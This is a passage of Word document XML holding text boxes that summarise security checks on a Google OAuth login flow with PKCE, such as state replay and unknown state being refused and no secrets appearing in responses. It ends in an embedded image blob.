                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2747" name="Rectangle 2747"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="145504"/>
                            <a:ext cx="2100659" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="33115CFE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>GET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/auth/google/redirect</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2748" name="Rectangle 2748"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="316954"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1533323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49" name="Rectangle 2749"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="316954"/>
                            <a:ext cx="5142992" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7447C044" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>response_type</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">        = code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Authorization Code, not Implicit)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2750" name="Rectangle 2750"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="488404"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65C10968"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51" name="Rectangle 2751"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="488404"/>
                            <a:ext cx="3621825" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="50105C6D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code_challenge_method</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">= S256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not "plain")</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2752" name="Rectangle 2752"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="659854"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="61F1014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53" name="Rectangle 2753"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="659854"/>
                            <a:ext cx="4925683" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="74E6E3A4" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code_challenge</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">       = 43 chars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correct S256 base64url length)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2754" name="Rectangle 2754"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="831304"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="288AE082"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55" name="Rectangle 2755"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="831304"/>
                            <a:ext cx="2607714" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3ABCEE0D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">nonce, state         = 40 </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>chars</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> each</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2756" name="Rectangle 2756"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1012279"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4EFC92C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57" name="Rectangle 2757"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="1012279"/>
                            <a:ext cx="2173095" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="505FFD18" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code_verifier</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> in response?  </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>no</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2758" name="Rectangle 2758"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1183729"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1EBAFCC7"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59" name="Rectangle 2759"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="1183729"/>
                            <a:ext cx="2173095" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7B27F95F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>client_secret</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> in response?  </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>no</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2760" name="Rectangle 2760"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1526629"/>
                            <a:ext cx="2173095" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7AF8CD8D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>POST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/auth/google/callback</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2761" name="Rectangle 2761"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1698079"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="37B3726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62" name="Rectangle 2762"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="1698079"/>
                            <a:ext cx="5142992" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7F330279" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">unknown state           → </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>400  +</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> audit entry </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>auth.google</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>.state_rejected</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2763" name="Rectangle 2763"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1869529"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="18A1B1E8"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64" name="Rectangle 2764"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="1869529"/>
                            <a:ext cx="4998119" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4BD0025D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>valid state, 1st use    → accepted (then 401: deliberately fake code)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2765" name="Rectangle 2765"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2040979"/>
                            <a:ext cx="144873" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="063BE360"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wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2766" name="Rectangle 2766"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="2040979"/>
                            <a:ext cx="3404516" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7127EEFF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">same state, 2nd use     → </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>400  ←</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> replay refused</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="73C5C183" id="Group 29755" o:spid="_x0000_s1361" style="width:510.25pt;height:178.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,2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&#10;epQWG44LNXa0rqk8